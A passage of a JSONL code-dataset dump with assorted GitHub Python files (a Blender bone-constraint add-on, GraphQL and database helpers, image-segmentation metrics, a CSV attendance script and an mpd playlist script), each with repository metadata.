float(con.to_min_y)\n constraint.to_max_y_scale = float(con.to_max_y)\n constraint.to_min_z_scale = float(con.to_min_z)\n constraint.to_max_z_scale = float(con.to_max_z)\n elif con.type == \"COPY_LOCATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.head_tail = float(con.head_tail)\n constraint.use_offset = con.use_offset\n elif con.type == \"COPY_ROTATION\":\n constraint.use_x = con.from_min_x == \"True\"\n constraint.invert_x = con.from_max_x == \"True\"\n constraint.use_y = con.from_min_y == \"True\"\n constraint.invert_y = con.from_max_y == \"True\"\n constraint.use_z = con.from_min_z == \"True\"\n constraint.invert_z = con.from_max_z == \"True\"\n constraint.use_offset = con.use_offset\n\n if con.type == \"TRANSFORM\" or con.type == \"COPY_LOCATION\" or \\\n con.type == \"COPY_ROTATION\":\n constraint.target_space = con.target_space\n constraint.owner_space = con.owner_space\n\n constraint.influence = con.influence\n\n if con.type == \"IK\":\n if con.pole_target != \"\":\n constraint.pole_target = bpy.data.objects[target]\n if con.pole_subtarget != \"\":\n constraint.pole_subtarget = con.pole_subtarget\n constraint.pole_angle = 
con.pole_angle\n constraint.iterations = con.iterations\n constraint.chain_count = con.chain_count\n constraint.use_tail = con.use_tail\n constraint.use_stretch = con.use_stretch\n constraint.use_location = con.use_location\n constraint.weight = con.weight\n constraint.use_rotation = con.use_rotation\n constraint.orient_weight = con.orient_weight\n\n return {'FINISHED'}\n\n\nclass XMillerTransformations(bpy.types.Operator):\n\n bl_idname = \"object.x_miller_transformations\"\n bl_label = \"XMillerTransformations\"\n bl_description = \"X-Axis Miller Bone Transformation constraints.\"\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n\n props = context.window_manager.sync_bone_constraints_props\n\n props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Start.\")\n\n if props.direction == \"l2r\":\n key = r\"\\.L($|\\.|_)\"\n other_side = \"R\"\n else:\n key = r\"\\.R($|\\.|_)\"\n other_side = \"L\"\n\n for x in bpy.context.selected_pose_bones:\n\n # SKIP Other side & Center bones\n if re.search(key, x.name) is None:\n continue\n\n print(re.search(key, x.name) == False)\n\n if len(x.constraints) == 0:\n continue\n\n for y in x.constraints:\n if y.type == \"TRANSFORM\":\n print(x.name + \", \" + y.name)\n\n # search other side bone & constraint\n other_side_bone_name =\\\n common.get_otherside_name(key, other_side, x.name)\n\n if re.search(key, y.subtarget) is None:\n continue\n\n other_side_tgt_name =\\\n common.get_otherside_name(key, other_side, y.subtarget)\n\n x2 = x.id_data.pose.bones[other_side_bone_name]\n y2 = x2.constraints[y.name]\n\n\n # data.bone_name = x.name\n # data.constraint_name = y.name\n y2.mute = y.mute\n # y2.target = y.target.name\n y2.subtarget = other_side_tgt_name\n y2.use_motion_extrapolate = y.use_motion_extrapolate\n y2.from_min_x = y.from_min_x\n y2.from_max_x = y.from_max_x\n y2.from_min_y = y.from_min_y\n y2.from_max_y = y.from_max_y\n y2.from_min_z = y.from_min_z\n y2.from_max_z = y.from_max_z\n y2.map_to_x_from = y.map_to_x_from\n y2.map_to_y_from = y.map_to_y_from\n y2.map_to_z_from = y.map_to_z_from\n y2.map_to = y.map_to\n\n if y.map_to == \"LOCATION\":\n y2.to_min_x = y.to_min_x\n y2.to_max_x = y.to_max_x\n y2.to_min_y = y.to_min_y\n y2.to_max_y = y.to_max_y\n y2.to_min_z = y.to_min_z\n y2.to_max_z = y.to_max_z\n elif y.map_to == \"ROTATION\":\n y2.to_min_x_rot = y.to_min_x_rot\n y2.to_max_x_rot = y.to_max_x_rot\n y2.to_min_y_rot = y.to_min_y_rot\n y2.to_max_y_rot = y.to_max_y_rot\n y2.to_min_z_rot = y.to_min_z_rot\n y2.to_max_z_rot = y.to_max_z_rot\n else:\n # map_to:SCALE\n y2.to_min_x_scale = y.to_min_x_scale\n y2.to_max_x_scale = y.to_max_x_scale\n y2.to_max_y_scale = y.to_max_y_scale\n y2.to_min_y_scale = y.to_min_y_scale\n y2.to_min_z_scale = y.to_min_z_scale\n y2.to_max_z_scale = y.to_max_z_scale\n\n y2.target_space = y.target_space\n y2.owner_space = y.owner_space\n y2.influence = y.influence\n # y2.type = y.type\n\n props.msg_x_miller_chk = bpy.app.translations.pgettext(\"Finished.\")\n\n return {'FINISHED'}\n\n\n\n# Add \"Auto Breakdown\" tab on Tool Shelf\nclass VIEW3D_PT_AutoBreakdown(bpy.types.Panel):\n\n bl_label = bpy.app.translations.pgettext(\"Sync Bone Constraints\")\n # String on TAB\n bl_space_type = 'VIEW_3D' # Area which show menu\n bl_region_type = 'TOOLS' # Region which show menu\n bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n # String displayed in the header of the menu that opened the tab\n bl_context = \"posemode\" # Context which show panel\n\n # Determine whether this class's processing can run\n @classmethod\n def 
poll(cls, context):\n # Show the menu only while an object is selected\n for o in bpy.data.objects:\n if o.select:\n return True\n return False\n\n # Customize the header\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon='PLUGIN')\n\n # Menu drawing routine\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n props = context.window_manager.sync_bone_constraints_props\n\n\n # Show the file browser\n layout.label(text = props.csv_file_directory)\n layout.label(text = props.csv_file_name)\n layout.operator(SelectCSVFile.bl_idname)\n\n# # CharacterName\n# layout.label(text = bpy.app.translations.pgettext(\"Character Name:\"))\n# layout.label(text = bpy.path.abspath(\"//\"))\n\n# # display the properties\n# layout.prop(props, \"emotion\", \\\n# text=bpy.app.translations.pgettext(\"Emotion\"))\n\n# layout.separator()\n\n# layout.prop(props, \"overwrite_data\", \\\n# text=bpy.app.translations.pgettext(\"Overwrite Data\"))\n\n\n# layout.prop_search(props, \"sel_obj\", context.scene, \\\n# \"objects\", text=\"Objects\")\n# row = layout.row()\n# row.prop_search(props, \"sel_obj\", context.scene, \"objects\", text=\"Objects\")\n# row = layout.row()\n# row.prop(props, \"sel_obj\")\n\n row = layout.row()\n\n props.init_val_list()\n\n row.prop_search(props, \"sel_armature\", props,\n \"string_val_list\",\n text = bpy.app.translations.pgettext(\"Target\"),\n icon=\"OUTLINER_OB_ARMATURE\")\n\n# row = layout.row()\n# row.prop(props, \"sel_armature\")\n\n # props.update_val(props.sel_armature)\n# row.prop(props, \"sel_string_val\")\n\n layout.separator()\n\n row = layout.row()\n box = row.box()\n box_row = box.row()\n\n props.check()\n\n box_row.label(text = props.msg_chk, icon=props.msg_icon)\n\n layout.operator(SyncBoneConstraints.bl_idname, \\\n text = bpy.app.translations.pgettext(\"Sync\"))\n\n# layout.separator()\n\n# layout.operator(ExportBoneConstraints.bl_idname, \\\n# text = bpy.app.translations.pgettext(\"Write CSV\"))\n\n# layout.separator()\n\n# layout.operator(ImportBoneConstraints.bl_idname, \\\n# text = bpy.app.translations.pgettext(\"Read CSV\"))\n\n# layout.separator()\n\n# layout.operator(SyncBonesIK.bl_idname, \\\n\n\n# Add X-Miller Function Panel\nclass VIEW3D_PT_XMiller(bpy.types.Panel):\n\n bl_label = bpy.app.translations.pgettext(\"X-Miller Bone Transformations\")\n # String on TAB\n bl_space_type = 'VIEW_3D' # Area which show menu\n bl_region_type = 'TOOLS' # Region which show menu\n bl_category = bpy.app.translations.pgettext(\"Auto Breakdown\")\n # String displayed in the header of the menu that opened the tab\n bl_context = \"posemode\" # Context which show panel\n\n # Determine whether this class's processing can run\n @classmethod\n def poll(cls, context):\n # Show the menu only while an object is selected\n for o in bpy.data.objects:\n if o.select:\n return True\n return False\n\n # Customize the header\n def draw_header(self, context):\n layout = self.layout\n layout.label(text=\"\", icon='PLUGIN')\n\n # Menu drawing routine\n def draw(self, context):\n layout = self.layout\n scene = context.scene\n props = context.window_manager.sync_bone_constraints_props\n\n\n layout.prop(props, \"direction\", \\\n text=bpy.app.translations.pgettext(\"direction\"))\n\n layout.separator()\n\n row = layout.row()\n box = row.box()\n box_row = box.row()\n\n # props.check_x_miller()\n\n box_row.label(text = props.msg_x_miller_chk, icon=\"NONE\")\n\n layout.operator(XMillerTransformations.bl_idname, \\\n text = bpy.app.translations.pgettext(\"Copy\"))\n\n# text = bpy.app.translations.pgettext(\"Sync 
IK\"))\n","repo_name":"natukikazemizo/Sedna1.0","sub_path":"src/python/addons/animation_auto_breakdown/sync_bone_constraints.py","file_name":"sync_bone_constraints.py","file_ext":"py","file_size_in_byte":27340,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"}
+{"seq_id":"12143731526","text":"from contextvars import ContextVar\nfrom typing import Type, TypeVar\n\nfrom gino import Gino\n\n\n__all__ = \"ContextGino\",\n\nT = TypeVar(\"T\")\n\n\nclass ContextGino(Gino):\n \"\"\"\n For context bind, and pool.\n usage is simple\n just ContextGino.get_current() but only in functions, and something lke this\n and you should ready for atack of gino engine instance\n but take care about global \"GINO\"'s\n like that globals may raise huge problems\n \"\"\"\n # unfortunetly, variant of\n # using with ContextInstanceMixin from aiogram\n # not working\n __context_instance = ContextVar(\"context_gino\")\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.set_current(ContextGino)\n\n @classmethod\n def get_current(cls: Type[T], no_error: bool = True) -> T:\n try:\n ctx = cls.__context_instance.get()\n except LookupError:\n if no_error:\n return\n raise\n else:\n return ctx\n\n @classmethod\n def set_current(cls: Type[T], value: T) -> None:\n assert not isinstance(value, cls), \\\n f'Value should be instance of {cls.__name__!r} not {type(value).__name__!r}'\n cls.__context_instance.set(value)\n","repo_name":"pikoUsername/authboi","sub_path":"iternal/store/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"16946761587","text":"import contextlib\n\nimport click\nimport sty\n\nimport xthematic.colors\nimport xthematic.themes\nfrom xthematic.term import TERMINAL_COLORS\n\n\nclass ColoredContext:\n all_color_identifiers = set(xthematic.colors.ColorIdentifier.all_four_bit_colors())\n\n def __init__(self):\n self.used_color_ids = set()\n self.overwritten_colors = {}\n\n @property\n def registered_ids(self):\n return set(self.overwritten_colors.keys())\n\n @property\n def free(self):\n return self.all_color_identifiers - self.registered_ids - self.used_color_ids\n\n def register_color(self, color):\n if len(self.free) < 0:\n raise RuntimeError(\"cannot register any more color values.\")\n elif color in xthematic.term.TERMINAL_COLORS.values():\n raise ValueError(f\"color {color} is already defined in the terminal's colors\")\n\n id_ = self.free.pop()\n self.overwritten_colors[id_] = xthematic.term.TERMINAL_COLORS[id_]\n try:\n xthematic.term.TERMINAL_COLORS[id_] = color\n except Exception:\n del self.overwritten_colors[id_]\n raise\n\n def unregister_color(self, color):\n id_ = self.id_for_color(color)\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n del self.overwritten_colors[id_]\n self.used_color_ids.remove(id_)\n\n def unregister_all(self):\n for id_ in self.registered_ids:\n xthematic.term.TERMINAL_COLORS[id_] = self.overwritten_colors[id_]\n self.overwritten_colors.clear()\n self.used_color_ids.clear()\n\n def format_string_for_ids(self, fg_id=None, bg_id=None):\n s = '{}' + sty.rs.all\n if fg_id:\n s = sty.fg(fg_id.four_bit_color_name) + s\n self.used_color_ids.add(fg_id)\n if bg_id:\n s = sty.bg(bg_id.four_bit_color_name) + s\n self.used_color_ids.add(bg_id)\n return s\n\n def format_string_for_colors(self, fg_color=None, bg_color=None):\n fg_id = self.id_for_color(fg_color) if fg_color else None\n bg_id = self.id_for_color(bg_color) if bg_color else None\n return self.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n\n @staticmethod\n def printable_colors():\n return xthematic.term.TERMINAL_COLORS.values()\n\n @staticmethod\n def id_for_color(color):\n for id_, value in xthematic.term.TERMINAL_COLORS.items():\n if value == color:\n return id_\n raise ValueError(f\"there is no registered {color}\")\n\n\nclass ColoredStream:\n def __init__(self, context):\n self.context = context\n\n @classmethod\n @contextlib.contextmanager\n def open(cls):\n cc = ColoredContext()\n yield cls(context=cc)\n cc.unregister_all()\n\n def echo_by_id(self, text, nl=True, fg_id=None, bg_id=None):\n s = self.context.format_string_for_ids(fg_id=fg_id, bg_id=bg_id)\n click.echo(s.format(text), nl=nl)\n\n def echo(self, text, nl=True, fg=None, bg=None):\n if fg and fg not in self.context.printable_colors():\n self.context.register_color(fg)\n if bg and bg not in self.context.printable_colors():\n self.context.register_color(bg)\n s = self.context.format_string_for_colors(fg_color=fg, bg_color=bg)\n click.echo(s.format(text), nl=nl)\n\n\ndef escape_sequence_index_string(fg_id, bg_id):\n fg_bright = int(fg_id.id in range(8, 16))\n return f'{fg_bright};{30+(fg_id.id % 8)};{40+(bg_id.id % 8)}'\n\n\ndef echo_theme(theme_name=None):\n with ColoredStream.open() as stream:\n for row_id in xthematic.colors.ColorIdentifier.all_four_bit_colors():\n for col_id in list(xthematic.colors.ColorIdentifier.all_four_bit_colors())[:8]:\n stream.echo_by_id(text=escape_sequence_index_string(fg_id=row_id, bg_id=col_id),\n nl=False, fg_id=row_id, bg_id=col_id)\n click.echo(' ', nl=False)\n 
click.echo(nl=True)\n input()\n\n\n","repo_name":"taesko/xthematic","sub_path":"src/xthematic/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":4002,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
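`escape_sequence_index_string()` above encodes standard SGR parameters: a bold/bright flag, a foreground code in 30-37, and a background code in 40-47. The same grid printed with raw escapes and no sty/click dependencies, to make the numbering concrete:

```python
# print an 8x8 foreground/background sample grid using raw ANSI SGR codes
for fg in range(8):
    row = []
    for bg in range(8):
        params = "1;%d;%d" % (30 + fg, 40 + bg)          # bright; fg; bg
        row.append("\x1b[%sm %s \x1b[0m" % (params, params))
    print("".join(row))
```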
+{"seq_id":"23000275621","text":"# https://leetcode.com/problems/two-sum/\n\nclass Solution:\n \n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \n dic = {}\n \n for i, num in enumerate(nums):\n dic[num] = i\n \n for i, num in enumerate(nums):\n \n pair = target - num\n \n if pair in dic and dic[pair] != i:\n return [i, dic[pair]]\n","repo_name":"soldambi/code-practice","sub_path":"LeetCode/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"27509528006","text":"import csv\nfrom datetime import datetime,date,time,timedelta\n\ntime_format_str = '%H:%M:%S'\ndate_format_str = '%Y-%m-%d'\nnow_format_str = '%Y-%m-%d %H:%M:%S'\nname1 = 'Abigail Peterson'\nname2 = 'Anita Oliver'\ncode_str1 = '041405513376'\ncode_str2 = '041078536769'\n\ndef time_now():\n\tnow = datetime.now().strftime(time_format_str)\n\tnow = str(now)\n\treturn now\n\t\ndef date_now():\n\ttoday = datetime.now().strftime(date_format_str)\n\ttoday = str(today)\n\treturn today\n\t\ndef main():\t\n\twith open('./attendances/'+date_now()+'.csv',mode='r') as csvfile:\n\t\tcsvreader = csv.reader(csvfile)\n\t\tindex = -1\n\t\tall_line_rev = list(reversed(list(csvreader)))\n\t\tfor row in all_line_rev:\n\t\t\tindex += 1\n\t\t\tif row[1] == code_str1:\n\t\t\t\tbreak\n\t\t\n\t\tall_line_rev[index][3] = 'MLEBU'\n\t\tall_line = list(reversed(all_line_rev))\n\t\t\n\twith open('./attendances/'+date_now()+'.csv',mode='w') as csvfile:\n\t\tpresence_write = csv.writer(csvfile, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\tfor rows in all_line:\n\t\t\tpresence_write.writerow(rows)\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tpass\n\t\t\n# with open('./attendances/'+date_input+'.csv',mode='a') as writing:\n\t\t# presence_write = csv.writer(writing, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\t# presence_write.writerow([time_input,id,employee_full,status])\n\t\t\n\t\t\n\t\t\n\t\t\n","repo_name":"bimanjayaaji/rfid-attendance--odoo","sub_path":"_archieved/csv_form.py","file_name":"csv_form.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"28192142342","text":"import datetime\n\nimport graphene\nimport sqlalchemy as sa\nfrom graphene import ObjectType\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom models.db_models import (\n Place,\n SecretPlaceExtra,\n Category,\n ActionsEconomy,\n)\nfrom utils.api_auth import AuthChecker\nfrom utils.config import settings as s\nfrom utils.smp_exceptions import Exc, ExceptionGroupEnum, ExceptionReasonEnum\nfrom ..gql_id import decode_gql_id\nfrom ..gql_types.place_type import PlaceType\nfrom ..service_types.coin_change_object import CoinChange\n\n\nclass PlaceAddition(ObjectType):\n added_place = graphene.Field(type_=PlaceType)\n coin_change = graphene.Field(type_=CoinChange)\n\n\nclass PlaceDataInput(graphene.InputObjectType):\n name = graphene.String(required=True)\n category_id = graphene.String(required=True)\n coordinate_longitude = graphene.Float(required=True)\n coordinate_latitude = graphene.Float(required=True)\n\n address = graphene.String()\n description = graphene.String()\n\n\nclass SecretPlaceExtraInput(graphene.InputObjectType):\n food_suggestion = graphene.String()\n time_suggestion = graphene.String()\n company_suggestion = graphene.String()\n music_suggestion = graphene.String()\n extra_suggestion = graphene.String()\n\n\nclass MutationAddPlace(graphene.Mutation):\n class Arguments:\n place_data = PlaceDataInput()\n secret_place_extra = SecretPlaceExtraInput()\n\n coin_change = graphene.Field(type_=CoinChange)\n new_place = graphene.Field(type_=PlaceType)\n\n @classmethod\n async def mutate(\n cls, root, info, place_data: dict, secret_place_extra: dict | None = None\n ):\n session: AsyncSession = info.context.session\n user_id = await AuthChecker.check_auth_mutation(session=session, info=info)\n possible_actions = await ActionsEconomy.verify_possibility(\n session=session, user_id=user_id\n )\n new_place = await basic_mapper(Place, place_data)\n new_place[Place.owner_id] = user_id\n place_category = (\n await session.execute(\n sa.select(Category.id, Category.name).where(\n Category.id == new_place[Place.category_id]\n )\n )\n ).fetchone()\n\n is_secret_place = place_category.name == s.SECRET_PLACE_NAME\n\n if not is_secret_place and secret_place_extra is not None:\n Exc.value(\n message=\"It is not possible to enter the data of a secret place in a normal place\",\n of_group=ExceptionGroupEnum.BAD_INPUT,\n reasons=ExceptionReasonEnum.INCORRECT_VALUE,\n )\n\n existing_places = (\n await session.execute(\n sa.select(Place.id).where(\n sa.and_(\n Place.owner_id == user_id,\n Place.category_id == place_category.id,\n )\n )\n )\n ).fetchall()\n if existing_places:\n action_name = (\n \"Create new secret place\"\n if is_secret_place\n else \"Create a new place of the same category\"\n )\n else:\n action_name = (\n \"Create first secret place\" if is_secret_place else \"Create a place\"\n )\n # TODO return how much more coins is needed - Ougen\n if not possible_actions[action_name]:\n Exc.low_wallet(\n message=\"Insufficient coins\",\n of_group=ExceptionGroupEnum.BAD_BALANCE,\n reasons=ExceptionReasonEnum.LOW_BALANCE,\n )\n\n # adding a place to db\n if is_secret_place and secret_place_extra:\n new_secret_place_data = await basic_mapper(\n SecretPlaceExtra, secret_place_extra\n )\n secret_place_id = (\n await session.execute(\n sa.insert(SecretPlaceExtra)\n .values(new_secret_place_data)\n .returning(SecretPlaceExtra.id)\n )\n ).scalar()\n else:\n secret_place_id = None\n new_place[Place.secret_extra_id] = secret_place_id\n uploaded_place_id = (\n (\n await 
session.execute(\n sa.insert(Place).values(new_place).returning(Place.id)\n )\n )\n .fetchone()\n .id\n )\n\n # setting for all other places of the same type on fire\n time_to_decay = datetime.datetime.now() + datetime.timedelta(\n hours=s.PLACE_DECAY_DURATION_HOURS\n )\n # set some places on fire\n await session.execute(\n sa.update(Place)\n .where(\n sa.and_(\n Place.owner_id == user_id,\n Place.id != uploaded_place_id,\n Place.category_id == place_category.id,\n Place.active_due_date.is_(None),\n )\n )\n .values({Place.active_due_date: time_to_decay})\n .returning(Place.id)\n )\n\n coin_change = await ActionsEconomy.execute(\n session=session, action_name=action_name, coin_receiver_user_id=user_id\n )\n return MutationAddPlace(\n coin_change=coin_change,\n new_place=PlaceType.get_node(info, uploaded_place_id),\n )\n\n\nasync def basic_mapper(classtype, value):\n # TODO Document this piece of code - Ougen*\n # TODO remove async pollution here - Ougen*\n new_value = {}\n for attr, attr_val in value.items():\n if \"id\" in attr:\n attr_val = decode_gql_id(attr_val)[1]\n if hasattr(classtype, attr):\n new_value[getattr(classtype, attr)] = attr_val\n return new_value\n","repo_name":"MajorXaker/showmeplace-api","sub_path":"gql/mutations/add_place.py","file_name":"add_place.py","file_ext":"py","file_size_in_byte":5797,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"}
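`basic_mapper()` above keys the values dict by the model's column attributes rather than by name. A stripped-down version of that idea with plain objects in place of SQLAlchemy columns; `decode_gql_id` is replaced by a fake decoder that only mimics its (type name, primary key) return shape:

```python
def decode_gql_id(gql_id: str):
    # stand-in: the real function decodes a GraphQL global ID
    return ("Place", int(gql_id.split(":")[1]))

class Place:
    name = "name_column"             # stand-ins for mapped column attributes
    category_id = "category_id_column"

def basic_mapper(classtype, value: dict) -> dict:
    mapped = {}
    for attr, attr_val in value.items():
        if "id" in attr:             # id-like inputs arrive as encoded GraphQL ids
            attr_val = decode_gql_id(attr_val)[1]
        if hasattr(classtype, attr): # ignore keys the model does not define
            mapped[getattr(classtype, attr)] = attr_val
    return mapped

print(basic_mapper(Place, {"name": "Cafe", "category_id": "Category:7"}))
# -> {'name_column': 'Cafe', 'category_id_column': 7}
```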
+{"seq_id":"4941342603","text":"import numpy as np\nimport cv2\n\ndef max_contour(inp_img):\n\n norm_image = cv2.normalize(inp_img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,25,255,cv2.THRESH_BINARY)[1]\n\n contours,_ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n max = [0,0,0,0]\n\n for c in contours:\n x,y,w,h = cv2.boundingRect(c)\n\n if w*h > max[2]*max[3]:\n max = [x,y,w,h]\n point1 = (max[0],max[1]+max[3])\n point2 = (max[0]+max[2],max[1])\n\n angle = np.arctan(max[3]/max[2])\n \n return point1, point2, angle\n\ndef pred_needle_img(point1, point2, size=(440, 500)):\n\n zeros = np.zeros(size)\n cv2.line(zeros, point1, point2, (255,255,255), 2)\n \n return zeros\n\ndef inline_BB(point1, point2, shape, a = 15):\n \n x1, y1 = point1\n x2, y2 = point2\n\n zeros = np.zeros(shape)\n cv2.line(zeros, (x1, y1), (x2, y2), (255,255,255), 1)\n\n tan = -1*(y1-y2)/(x1-x2)\n theta = np.arctan(tan)\n\n cos_minus_sin = np.cos(theta) - np.sin(theta)\n\n cos_plus_sin = np.cos(theta) + np.sin(theta)\n\n point1 = [x1-a*cos_minus_sin, y1 + a*cos_plus_sin]\n point2 = [x1-a*cos_plus_sin, y1 - a*cos_minus_sin]\n point3 = [x2 + a*cos_minus_sin, y2 - a*cos_plus_sin]\n point4 = [x2 + a*cos_plus_sin, y2 + a*cos_minus_sin]\n\n pts = np.array([point1, point2, \n point3, point4],\n np.int32)\n\n image = cv2.polylines(zeros, [pts], True, (255,255,255), 1)\n return image\n\ndef max_contour(img):\n norm_image = cv2.normalize(img, None, alpha = 0, beta = 255, norm_type = cv2.NORM_MINMAX, dtype = cv2.CV_32F)\n norm_image = norm_image.astype(np.uint8)\n\n thresholded = cv2.threshold(norm_image,127,255,cv2.THRESH_BINARY)[1]\n\n contours, _ = cv2.findContours(thresholded.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n output = np.zeros_like(img)\n if len(contours) != 0:\n c = max(contours, key = cv2.contourArea)\n cv2.drawContours(output, [c], -1, 255, -1)\n\n return output\n\ndef angle_acc(act_angle, pred_angle):\n return (act_angle-pred_angle)**2\n\ndef dist_acc(pred_point1, pred_point2, act_point1, act_point2, size):\n\n center = np.array(size)/2\n\n pred_point1 = np.array(pred_point1)\n pred_point2 = np.array(pred_point2)\n \n pred_dist = np.cross(pred_point2-pred_point1,center-pred_point1)/np.linalg.norm(pred_point2-pred_point1)\n\n act_point1 = np.array(act_point1)\n act_point2 = np.array(act_point2)\n \n act_dist = np.cross(act_point2-act_point1,center-act_point1)/np.linalg.norm(act_point2-act_point1)\n \n return np.square(act_dist-pred_dist)\n\ndef dice_coef(y_true, y_pred):\n\n y_true_f = y_true.flatten()\n y_pred_f = y_pred.flatten()\n intersection = np.sum(y_true_f * y_pred_f)\n smooth = 0.0001\n return (2. 
* intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)\n\ndef IOU(act_rect, pred_rect):\n\n intersection = np.logical_and(act_rect, pred_rect)\n union = np.logical_or(act_rect, pred_rect)\n \n iou_score = np.sum(intersection) / np.sum(union)\n \n return iou_score\n\ndef recall(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fn = np.sum(np.logical_and(act_rect, 1-pred_rect))\n recall = tp/(tp+fn)\n\n return recall\n\ndef precision(act_rect, pred_rect):\n\n tp = np.sum(np.logical_and(act_rect, pred_rect))\n fp = np.sum(np.logical_and(1-act_rect, pred_rect))\n precision = tp/(tp+fp)\n\n return precision\n \ndef F1(precision,recall):\n F1=2*precision*recall/(precision+recall)\n \n return F1","repo_name":"gupta-bhavesh/Curriculum_KD","sub_path":"needle/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
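A tiny worked check of the overlap metrics defined above: two 3x3 masks sharing two pixels give intersection 2, union 4, and mask sums of 3 each, so IoU is 0.5 and Dice is 4/6:

```python
import numpy as np

a = np.array([[1, 1, 1], [0, 0, 0], [0, 0, 0]])
b = np.array([[0, 1, 1], [1, 0, 0], [0, 0, 0]])

inter = np.sum(np.logical_and(a, b))              # 2 shared pixels
union = np.sum(np.logical_or(a, b))               # 4 pixels covered in total
print("IoU :", inter / union)                     # 0.5
print("Dice:", 2 * inter / (a.sum() + b.sum()))   # 4/6 ~= 0.667
```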
+{"seq_id":"18524626816","text":"import os\nfrom com.common import COLOR\nimport cv2\n\nclass SaveToFrame (object):\n def __init__(self,**kwargs):\n self.frame = kwargs['frame']\n self.f_path = kwargs['path']\n self.f_name = kwargs['filename']\n #self.frame_id = kwargs['frame_id']\n #self.x, self.y = kwargs['x'], kwargs['y']\n #self.s = kwargs['s']\n\n\n\n def create_full_frame(self):\n frame = os.path.join(self.f_path, self.f_name)\n print(COLOR.RED + frame + COLOR.END)\n cv2.imwrite(frame + '.png', self.frame)\n\n\n\n\n\n","repo_name":"igorfed/Annotation_v1","sub_path":"com/common_frame_files.py","file_name":"common_frame_files.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"36126047171","text":"#!/usr/bin/env python3\n\n\"\"\"Playlist-manipulating mpc wrapper script.\n\nUsage:\n playlist [options]\n playlist [options] add \n playlist [options] add-from \n playlist [options] add-random \n playlist lyrics []\n playlist [options] pause-after-current []\n playlist repeat-current-once\n playlist -h | --help\n playlist --version\n\nOptions:\n -a, --all Add all items in the directory. Overrides `--number'.\n -h, --help Print this message and exit.\n -l, --filenames Print tracks as filenames instead of the default “artist — title format.\n -n, --number= Add this many items maximum. Set to `all' to add all items in the directory. Defaults to `all' for `add-random', and `1' for `add-from'.\n --version Print version info and exit.\n\"\"\"\n\nimport pathlib\nimport sys\n\nsys.path += ['/opt/py', str(pathlib.Path.home() / 'py')]\n\nimport contextlib\nimport os\nimport random\nimport re\nimport socket\nimport subprocess\n\nimport docopt # PyPI: docopt\nimport mpd # PyPI: python-mpd2\n\nimport syncbin\n\n__version__ = syncbin.__version__\n\nMPD_ROOT = pathlib.Path(os.environ.get('MPD_ROOT', '/Users/fenhl/Music'))\n\ndef client(host=None, port=6600, *, password=None, idle_timeout=None):\n if host is None:\n password, host = os.environ['MPD_HOST'].split('@')\n c = mpd.MPDClient()\n c.connect(host, port)\n if password is not None:\n c.password(password)\n if idle_timeout is not None:\n c.idletimeout = idle_timeout\n return c\n\ndef format_song(song, arguments={}):\n if not arguments.get('--filenames'):\n with contextlib.suppress(KeyError):\n return '{} — {}'.format(song['artist'], song['title'])\n return song['file']\n\nif __name__ == '__main__':\n arguments = docopt.docopt(__doc__, version='playlist from fenhl/syncbin ' + __version__)\n if arguments['add']:\n # add the given path to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n if (MPD_ROOT / path).is_dir():\n track_iterator = (MPD_ROOT / path).iterdir()\n else:\n track_iterator = iter([MPD_ROOT / path])\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n i = 0\n for f in sorted(track_iterator):\n if i >= amount:\n break\n subprocess.run(['mpc', 'add', str(f.relative_to(MPD_ROOT))], check=True)\n i += 0\n if arguments['add-from']:\n # add files from the given path's parent, starting with the given path, to the playlist in alphabetical order\n path = pathlib.Path(arguments[''])\n track_iterator = (MPD_ROOT / path).parent.iterdir()\n amount = float('inf') if arguments['--all'] or arguments['--number'] == 'all' else (float('inf') if arguments['--number'] is None else int(arguments['--number']))\n found = False\n i = 0\n for f in sorted(track_iterator):\n if f.name.startswith(path.name):\n 